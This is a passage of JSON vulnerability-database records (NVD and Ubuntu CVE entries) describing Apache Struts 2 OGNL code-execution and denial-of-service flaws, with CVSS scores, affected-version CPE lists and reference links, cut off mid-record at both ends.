"cpe:/a:apache:struts:2.3.15", "cpe:/a:apache:struts:2.0.7", "cpe:/a:apache:struts:2.1.4"], "id": "CVE-2013-2251", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2251", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:23:45", "description": "Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.", "cvss3": {}, "published": "2013-07-10T19:55:00", "type": "cve", "title": "CVE-2013-1965", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1965"], "modified": "2019-08-12T21:15:00", "cpe": ["cpe:/a:apache:struts2-showcase:2.3.13"], "id": "CVE-2013-1965", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1965", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts2-showcase:2.3.13:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:54:40", "description": "Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.", "cvss3": {}, "published": "2012-09-05T23:55:00", "type": "cve", "title": "CVE-2012-4387", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4387"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:apache:struts:2.0.9", "cpe:/a:apache:struts:2.0.7", "cpe:/a:apache:struts:2.0.11.2", "cpe:/a:apache:struts:2.1.6", "cpe:/a:apache:struts:2.0.5", "cpe:/a:apache:struts:2.0.14", "cpe:/a:apache:struts:2.0.10", "cpe:/a:apache:struts:2.1.5", "cpe:/a:apache:struts:2.0.11", "cpe:/a:apache:struts:2.2.1", "cpe:/a:apache:struts:2.0.8", "cpe:/a:apache:struts:2.0.11.1", "cpe:/a:apache:struts:2.3.1.1", "cpe:/a:apache:struts:2.0.3", "cpe:/a:apache:struts:2.1.3", "cpe:/a:apache:struts:2.3.4", "cpe:/a:apache:struts:2.0.4", "cpe:/a:apache:struts:2.2.1.1", "cpe:/a:apache:struts:2.2.3", "cpe:/a:apache:struts:2.2.3.1", "cpe:/a:apache:struts:2.1.8.1", "cpe:/a:apache:struts:2.1.8", "cpe:/a:apache:struts:2.0.13", "cpe:/a:apache:struts:2.0.2", "cpe:/a:apache:struts:2.0.12", "cpe:/a:apache:struts:2.3.1.2", "cpe:/a:apache:struts:2.1.2", "cpe:/a:apache:struts:2.0.0", "cpe:/a:apache:struts:2.0.6", "cpe:/a:apache:struts:2.3.1", "cpe:/a:apache:struts:2.1.4", "cpe:/a:apache:struts:2.1.0", "cpe:/a:apache:struts:2.0.1", "cpe:/a:apache:struts:2.3.3", "cpe:/a:apache:struts:2.1.1"], "id": "CVE-2012-4387", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4387", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:apache:struts:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.10:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:38:20", "description": "The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.", "cvss3": {}, "published": "2012-01-08T15:55:00", "type": "cve", "title": "CVE-2012-0391", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2018-11-23T14:36:00", "cpe": [], "id": "CVE-2012-0391", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0391", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T11:58:32", "description": "Apache Struts 2.x before 2.3.28 allows remote attackers to execute arbitrary code via a \"%{}\" sequence in a tag attribute, aka forced double OGNL evaluation.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-12T16:59:00", "type": "cve", "title": "CVE-2016-0785", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0785"], "modified": "2019-08-23T15:50:00", "cpe": ["cpe:/a:apache:struts:2.3.24.1"], "id": "CVE-2016-0785", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0785", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.24.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:48:46", "description": "Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.", "cvss3": {}, "published": "2012-03-02T22:55:00", "type": "cve", "title": "CVE-2012-0838", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0838"], "modified": "2018-12-07T16:22:00", "cpe": ["cpe:/a:apache:struts:2.2.3"], "id": "CVE-2012-0838", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0838", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.2.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:23:47", "description": "Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.", "cvss3": {}, "published": "2013-07-10T19:55:00", "type": "cve", "title": "CVE-2013-1966", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1966"], "modified": "2019-08-12T21:15:00", "cpe": [], "id": "CVE-2013-1966", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1966", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T14:01:37", "description": "Apache Struts 2.x before 2.3.29 allows remote attackers to execute arbitrary code via a \"%{}\" sequence in a tag attribute, aka forced double OGNL evaluation. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-0785.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-16T16:29:00", "type": "cve", "title": "CVE-2016-4461", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0785", "CVE-2016-4461"], "modified": "2019-05-01T20:17:00", "cpe": ["cpe:/a:netapp:oncommand_balance:-"], "id": "CVE-2016-4461", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4461", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:netapp:oncommand_balance:-:*:*:*:*:*:*:*"]}], "ubuntucve": [{"lastseen": "2022-08-04T14:24:39", "description": "Apache Struts 2 before 2.3.14.3 allows remote attackers to execute\narbitrary OGNL code via a request with a crafted action name that is not\nproperly handled during wildcard matching, a different vulnerability than\nCVE-2013-2135.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | Only affects Struts 2\n", "cvss3": {}, "published": "2013-07-16T00:00:00", "type": "ubuntucve", "title": "CVE-2013-2134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2134", "CVE-2013-2135"], "modified": "2013-07-16T00:00:00", "id": "UB:CVE-2013-2134", "href": "https://ubuntu.com/security/CVE-2013-2134", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T14:36:19", "description": "The OGNL extensive expression evaluation capability in XWork in Struts\n2.0.0 through 2.1.8.1, as used in Atlassian Fisheye, Crucible, and possibly\nother products, uses a permissive whitelist, which allows remote attackers\nto modify server-side context objects and bypass the \"#\" protection\nmechanism in ParameterInterceptors via the (1) #context, (2)\n#_memberAccess, (3) #root, (4) #this, (5) #_typeResolver, (6)\n#_classResolver, (7) #_traceEvaluations, (8) #_lastEvaluation, (9)\n#_keepLastEvaluation, and possibly other OGNL context variables, a\ndifferent vulnerability than CVE-2008-6504.", "cvss3": {}, "published": "2010-08-17T00:00:00", "type": "ubuntucve", "title": "CVE-2010-1870", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-6504", "CVE-2010-1870"], "modified": "2010-08-17T00:00:00", "id": "UB:CVE-2010-1870", "href": "https://ubuntu.com/security/CVE-2010-1870", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:10:53", "description": "Apache Struts 2.0.0 through 2.3.24.1 does not properly cache method\nreferences when used with OGNL before 3.0.12, which allows remote attackers\nto cause a denial of service (block access to a web site) via unspecified\nvectors.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | struts 2.x only\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-06-07T00:00:00", "type": "ubuntucve", "title": "CVE-2016-3093", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3093"], "modified": "2016-06-07T00:00:00", "id": "UB:CVE-2016-3093", "href": "https://ubuntu.com/security/CVE-2016-3093", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:24:39", "description": "Apache Struts 2 before 2.3.14.3 allows remote attackers to execute\narbitrary OGNL code via a request with a crafted value that contains both\n\"${}\" and \"%{}\" sequences, which causes the OGNL code to be evaluated\ntwice.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | Only Struts 2 is affected\n", "cvss3": {}, "published": "2013-07-16T00:00:00", "type": "ubuntucve", "title": "CVE-2013-2135", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2135"], "modified": "2013-07-16T00:00:00", "id": "UB:CVE-2013-2135", "href": "https://ubuntu.com/security/CVE-2013-2135", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T14:24:35", "description": "Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute\narbitrary OGNL expressions via a parameter with a crafted (1) action:, (2)\nredirect:, or (3) redirectAction: prefix.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | Only affected Struts 2 The bulk of the patch appears to be in http://svn.apache.org/viewvc?view=revision&revision=1502979 I've reviewed libstruts1.2-java code and could not find analogous code in our codebase.\n", "cvss3": {}, "published": "2013-07-20T00:00:00", "type": "ubuntucve", "title": "CVE-2013-2251", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2013-07-20T00:00:00", "id": "UB:CVE-2013-2251", "href": "https://ubuntu.com/security/CVE-2013-2251", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T14:24:40", "description": "Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before\n2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a\ncrafted parameter name that is not properly handled when invoking a\nredirect.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | per Debian, only affects Struts 2\n", "cvss3": {}, "published": "2013-07-10T00:00:00", "type": "ubuntucve", "title": "CVE-2013-1965", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1965"], "modified": "2013-07-10T00:00:00", "id": "UB:CVE-2013-1965", "href": "https://ubuntu.com/security/CVE-2013-1965", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T14:28:37", "description": "Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial\nof service (CPU consumption) via a long parameter name, which is processed\nas an OGNL expression.", "cvss3": {}, "published": "2012-09-05T00:00:00", "type": "ubuntucve", "title": "CVE-2012-4387", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4387"], "modified": "2012-09-05T00:00:00", "id": "UB:CVE-2012-4387", "href": "https://ubuntu.com/security/CVE-2012-4387", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:31:26", "description": "The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets\nparameter values as OGNL expressions during certain exception handling for\nmismatched data types of properties, which allows remote attackers to\nexecute arbitrary Java code via a crafted parameter.\n\n#### Bugs\n\n * <https://issues.apache.org/jira/browse/WW-3668>\n", "cvss3": {}, "published": "2012-01-08T00:00:00", "type": "ubuntucve", "title": "CVE-2012-0391", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2012-01-08T00:00:00", "id": "UB:CVE-2012-0391", "href": "https://ubuntu.com/security/CVE-2012-0391", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T14:12:10", "description": "Apache Struts 2.x before 2.3.28 allows remote attackers to execute\narbitrary code via a \"%{}\" sequence in a tag attribute, aka forced double\nOGNL evaluation.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[ebarretto](<https://launchpad.net/~ebarretto>) | Only 2.0.0 to 2.3.28.1\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-12T00:00:00", "type": "ubuntucve", "title": "CVE-2016-0785", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0785"], "modified": "2016-04-12T00:00:00", "id": "UB:CVE-2016-0785", "href": "https://ubuntu.com/security/CVE-2016-0785", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T14:30:53", "description": "Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression\nduring the handling of a conversion error, which allows remote attackers to\nmodify run-time data values, and consequently execute arbitrary code, 